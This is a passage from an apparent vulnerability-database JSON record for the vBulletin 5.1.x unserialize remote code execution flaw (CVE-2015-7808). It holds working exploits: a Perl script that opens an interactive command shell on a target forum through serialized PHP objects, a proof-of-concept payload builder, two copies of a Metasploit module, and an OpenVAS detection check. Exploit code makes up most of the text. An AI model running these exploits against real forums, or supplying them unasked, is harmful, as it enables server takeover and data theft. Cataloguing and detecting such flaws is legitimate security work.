https://ir.linkedin.com/in/rezasp\r\n# E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com\r\n# Website : www.reza.es\r\n# Twitter : https://twitter.com/rezesp\r\n# FaceBook : https://www.facebook.com/reza.espargham\r\n# Special Thanks : Mohammad Emad\r\n\r\nsystem(($^O eq 'MSWin32') ? 'cls' : 'clear');\r\n\r\nuse LWP::UserAgent;\r\nuse LWP::Simple;\r\n$ua = LWP::UserAgent ->new;\r\n\r\nprint \"\\n\\t Enter Target [ Example:http://target.com/forum/ ]\";\r\nprint \"\\n\\n \\t Enter Target : \";\r\n$Target=<STDIN>;\r\nchomp($Target);\r\n\r\n\r\n$response=$ua->get($Target . '/ajax/api/hook/decodeArguments?arguments=O:12:\"vB_dB_Result\":2:{s:5:\"%00*%00db\";O:11:\"vB_Database\":1:{s:9:\"functions\";a:1:{s:11:\"free_result\";s:6:\"system\";}}s:12:\"%00*%00recordset\";s:20:\"echo%20$((0xfee10000))\";}');\r\n\r\n$source=$response->decoded_content;\r\nif (($source =~ m/4276158464/i))\r\n{\r\n $response=$ua->get($Target . '/ajax/api/hook/decodeArguments?arguments=O:12:\"vB_dB_Result\":2:{s:5:\"%00*%00db\";O:11:\"vB_Database\":1:{s:9:\"functions\";a:1:{s:11:\"free_result\";s:6:\"system\";}}s:12:\"%00*%00recordset\";s:6:\"whoami\";}');\r\n $user=$response->decoded_content;\r\n chomp($user);\r\n print \"\\n Target Vulnerable ;)\\n\";\r\n while($cmd==\"exit\")\r\n {\r\n print \"\\n\\n$user\\$ \";\r\n $cmd=<STDIN>;\r\n chomp($cmd);\r\n if($cmd =~ m/exit/i){exit 0;}\r\n $len=length($cmd);\r\n $response=$ua->get($Target . '/ajax/api/hook/decodeArguments?arguments=O:12:\"vB_dB_Result\":2:{s:5:\"%00*%00db\";O:11:\"vB_Database\":1:{s:9:\"functions\";a:1:{s:11:\"free_result\";s:6:\"system\";}}s:12:\"%00*%00recordset\";s:'.$len.':\"'.$cmd.'\";}');\r\n print \"\\n\".$response->decoded_content;\r\n\r\n }\r\n}else{print \"\\ntarget is not Vulnerable\\n\\n\"}", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/38790/"}, {"lastseen": "2016-02-04T08:31:27", "description": "vBulletin 5.1.x - PreAuth 0day Remote Code Execution Exploit. Webapps exploit for php platform", "published": "2015-11-05T00:00:00", "type": "exploitdb", "title": "vBulletin 5.1.x - PreAuth 0day Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7808"], "modified": "2015-11-05T00:00:00", "id": "EDB-ID:38629", "href": "https://www.exploit-db.com/exploits/38629/", "sourceData": "# Exploit Title: Vbulletin 5.1.X unserialize 0day preauth RCE exploit\r\n# Date: Nov 4th, 2015\r\n# Exploit Author: hhjj\r\n# Vendor Homepage: http://www.vbulletin.com/\r\n# Version: 5.1.x\r\n# Tested on: Debian\r\n# CVE : \r\n# I did not discover this exploit, leaked from the IoT.\r\n\r\n# Build the object\r\nphp << 'eof'\r\n<?php\r\nclass vB_Database {\r\n public $functions = array();\r\n\r\n public function __construct() \r\n {\r\n $this->functions['free_result'] = 'phpinfo';\r\n }\r\n}\r\n\r\nclass vB_dB_Result {\r\n protected $db;\r\n protected $recordset;\r\n\r\n public function __construct()\r\n {\r\n $this->db = new vB_Database();\r\n $this->recordset = 1;\r\n }\r\n}\r\n\r\nprint urlencode(serialize(new vB_dB_Result())) . \"\\n\";\r\neof\r\nO%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bi%3A1%3B%7D\r\n\r\n#Then hit decodeArguments with your payload :\r\nhttp://localhost/vbforum/ajax/api/hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2a%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2a%00recordset%22%3Bi%3A1%3B%7D\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/38629/"}, {"lastseen": "2020-08-21T19:05:10", "description": "", "published": "2017-07-24T00:00:00", "type": "exploitdb", "title": "vBulletin 5.1.2 < 5.1.9 - Unserialize Code Execution (Metasploit)", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7808"], "modified": "2017-07-24T00:00:00", "id": "EDB-ID:48761", "href": "https://www.exploit-db.com/exploits/48761", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'vBulletin 5.1.2 Unserialize Code Execution',\r\n 'Description' => %q{\r\n This module exploits a PHP object injection vulnerability in vBulletin 5.1.2 to 5.1.9\r\n },\r\n 'Platform' => 'php',\r\n 'License' => MSF_LICENSE,\r\n 'Author' => [\r\n 'Netanel Rubin', # reported by\r\n 'cutz', # original exploit\r\n 'Julien (jvoisin) Voisin', # metasploit module\r\n ],\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\\x22\",\r\n },\r\n 'References' =>\r\n [\r\n ['CVE', '2015-7808'],\r\n ['EDB', '38629'],\r\n ['URL', 'http://pastie.org/pastes/10527766/text?key=wq1hgkcj4afb9ipqzllsq'],\r\n ['URL', 'http://blog.checkpoint.com/2015/11/05/check-point-discovers-critical-vbulletin-0-day/']\r\n ],\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' => [\r\n [ 'Automatic Targeting', { 'auto' => true } ],\r\n ['vBulletin 5.0.X', {'chain' => 'vB_Database'}],\r\n ['vBulletin 5.1.X', {'chain' => 'vB_Database_MySQLi'}],\r\n ],\r\n 'DisclosureDate' => 'Nov 4 2015',\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [ true, \"The base path to the web application\", \"/\"])\r\n ])\r\n end\r\n\r\n def check\r\n begin\r\n res = send_request_cgi({ 'uri' => target_uri.path })\r\n if (res && res.body.include?('vBulletin Solutions, Inc.'))\r\n if res.body.include?(\"Version 5.0\")\r\n @my_target = targets[1] if target['auto']\r\n return Exploit::CheckCode::Appears\r\n elsif res.body.include?(\"Version 5.1\")\r\n @my_target = targets[2] if target['auto']\r\n return Exploit::CheckCode::Appears\r\n else\r\n return Exploit::CheckCode::Detected\r\n end\r\n end\r\n rescue ::Rex::ConnectionError\r\n return Exploit::CheckCode::Safe\r\n end\r\n end\r\n\r\n def exploit\r\n print_status(\"Trying to inferprint the instance...\")\r\n\r\n @my_target = target\r\n check_code = check\r\n\r\n unless check_code == Exploit::CheckCode::Detected || check_code == Exploit::CheckCode::Appears\r\n fail_with(Failure::NoTarget, \"#{peer} - Failed to detect a vulnerable instance\")\r\n end\r\n\r\n if @my_target.nil? || @my_target['auto']\r\n fail_with(Failure::NoTarget, \"#{peer} - Failed to auto detect, try setting a manual target...\")\r\n end\r\n\r\n print_status(\"Exploiting #{@my_target.name}...\")\r\n\r\n chain = 'O:12:\"vB_dB_Result\":2:{s:5:\"*db\";O:'\r\n chain << @my_target[\"chain\"].length.to_s\r\n chain << ':\"'\r\n chain << @my_target[\"chain\"]\r\n chain << '\":1:{s:9:\"functions\";a:1:{s:11:\"free_result\";s:6:\"assert\";}}s:12:\"*recordset\";s:'\r\n chain << \"#{payload.encoded.length}:\\\"#{payload.encoded}\\\";}\"\r\n\r\n chain = Rex::Text.uri_encode(chain)\r\n chain = chain.gsub(/%2a/, '%00%2a%00') # php and Rex disagree on '*' encoding\r\n\r\n send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, 'ajax/api/hook/decodeArguments'),\r\n 'vars_get' => {\r\n 'arguments' => chain\r\n },\r\n 'encode_params' => false,\r\n })\r\n end\r\nend", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://www.exploit-db.com/download/48761"}], "metasploit": [{"lastseen": "2020-10-07T21:45:55", "description": "This module exploits a PHP object injection vulnerability in vBulletin 5.1.2 to 5.1.9\n", "published": "2015-11-12T20:36:01", "type": "metasploit", "title": "vBulletin 5.1.2 Unserialize Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7808"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/MULTI/HTTP/VBULLETIN_UNSERIALIZE", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'vBulletin 5.1.2 Unserialize Code Execution',\n 'Description' => %q{\n This module exploits a PHP object injection vulnerability in vBulletin 5.1.2 to 5.1.9\n },\n 'Platform' => 'php',\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Netanel Rubin', # reported by\n 'cutz', # original exploit\n 'Julien (jvoisin) Voisin', # metasploit module\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x22\",\n },\n 'References' =>\n [\n ['CVE', '2015-7808'],\n ['EDB', '38629'],\n ['URL', 'http://pastie.org/pastes/10527766/text?key=wq1hgkcj4afb9ipqzllsq'],\n ['URL', 'http://blog.checkpoint.com/2015/11/05/check-point-discovers-critical-vbulletin-0-day/']\n ],\n 'Arch' => ARCH_PHP,\n 'Targets' => [\n [ 'Automatic Targeting', { 'auto' => true } ],\n ['vBulletin 5.0.X', {'chain' => 'vB_Database'}],\n ['vBulletin 5.1.X', {'chain' => 'vB_Database_MySQLi'}],\n ],\n 'DisclosureDate' => '2015-11-04',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [ true, \"The base path to the web application\", \"/\"])\n ])\n end\n\n def check\n begin\n res = send_request_cgi({ 'uri' => target_uri.path })\n if (res && res.body.include?('vBulletin Solutions, Inc.'))\n if res.body.include?(\"Version 5.0\")\n @my_target = targets[1] if target['auto']\n return Exploit::CheckCode::Appears\n elsif res.body.include?(\"Version 5.1\")\n @my_target = targets[2] if target['auto']\n return Exploit::CheckCode::Appears\n else\n return Exploit::CheckCode::Detected\n end\n end\n rescue ::Rex::ConnectionError\n return Exploit::CheckCode::Safe\n end\n end\n\n def exploit\n print_status(\"Trying to inferprint the instance...\")\n\n @my_target = target\n check_code = check\n\n unless check_code == Exploit::CheckCode::Detected || check_code == Exploit::CheckCode::Appears\n fail_with(Failure::NoTarget, \"#{peer} - Failed to detect a vulnerable instance\")\n end\n\n if @my_target.nil? || @my_target['auto']\n fail_with(Failure::NoTarget, \"#{peer} - Failed to auto detect, try setting a manual target...\")\n end\n\n print_status(\"Exploiting #{@my_target.name}...\")\n\n chain = 'O:12:\"vB_dB_Result\":2:{s:5:\"*db\";O:'\n chain << @my_target[\"chain\"].length.to_s\n chain << ':\"'\n chain << @my_target[\"chain\"]\n chain << '\":1:{s:9:\"functions\";a:1:{s:11:\"free_result\";s:6:\"assert\";}}s:12:\"*recordset\";s:'\n chain << \"#{payload.encoded.length}:\\\"#{payload.encoded}\\\";}\"\n\n chain = Rex::Text.uri_encode(chain)\n chain = chain.gsub(/%2a/, '%00%2a%00') # php and Rex disagree on '*' encoding\n\n send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'ajax/api/hook/decodeArguments'),\n 'vars_get' => {\n 'arguments' => chain\n },\n 'encode_params' => false,\n })\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/vbulletin_unserialize.rb"}], "openvas": [{"lastseen": "2020-05-12T17:24:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-7808"], "description": "vBulletin is prone to a remote code-injection vulnerability because it fails to properly sanitize user-supplied input.", "modified": "2020-05-08T00:00:00", "published": "2015-11-10T00:00:00", "id": "OPENVAS:1361412562310105447", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105447", "type": "openvas", "title": "vBulletin PreAuth Remote Code Execution", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# vBulletin PreAuth Remote Code Execution\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:vbulletin:vbulletin\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105447\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_cve_id(\"CVE-2015-7808\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-11-10 18:30:30 +0100 (Tue, 10 Nov 2015)\");\n script_name(\"vBulletin PreAuth Remote Code Execution\");\n script_category(ACT_ATTACK);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_dependencies(\"vbulletin_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"vbulletin/detected\");\n\n script_xref(name:\"URL\", value:\"http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/4332166-security-patch-release-for-vbulletin-5-connect-versions-5-1-4-through-5-1-9\");\n\n script_tag(name:\"impact\", value:\"An attacker can exploit this vulnerability to inject and execute arbitrary code within the context of the affected application.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a special crafted HTTP GET request and check the response.\");\n\n script_tag(name:\"solution\", value:\"Vendor has released security patches.\");\n\n script_tag(name:\"summary\", value:\"vBulletin is prone to a remote code-injection vulnerability because it fails to properly sanitize user-supplied input.\");\n\n script_tag(name:\"affected\", value:\"vBulletin 5.1.4, 5.1.5, 5.1.6, 5.1.7, 5.1.8 and 5.1.9.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_active\");\n\n exit(0);\n}\n\ninclude(\"url_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! dir = get_app_location( cpe:CPE, port:port ) ) exit( 0 );\n\nif( dir == \"/\" ) dir = \"\";\n\nforeach db( make_list( \"vB_Database_MySQLi\", \"vB_Database\" ) ) {\n\n db_len = strlen( db );\n cmd = 'phpinfo';\n cmd_len = strlen( cmd );\n\n exp = 'O:12:\"vB_dB_Result\":2:{s:5:\"*db\";O:' + db_len + ':\"' + db + '\":1:{s:9:\"functions\";a:1:{s:11:\"free_result\";s:' + cmd_len + ':\"' + cmd + '\";}}s:12:\"*recordset\";i:1;}';\n\n exp = urlencode( str:exp );\n exp = str_replace( string:exp, find:'*', replace:'%00%2a%00' );\n\n url = dir + '/ajax/api/hook/decodeArguments?arguments=' + exp;\n\n if( http_vuln_check( port:port, url:url, pattern:'<title>phpinfo\\\\(\\\\)</title>' ) ) {\n report = http_report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
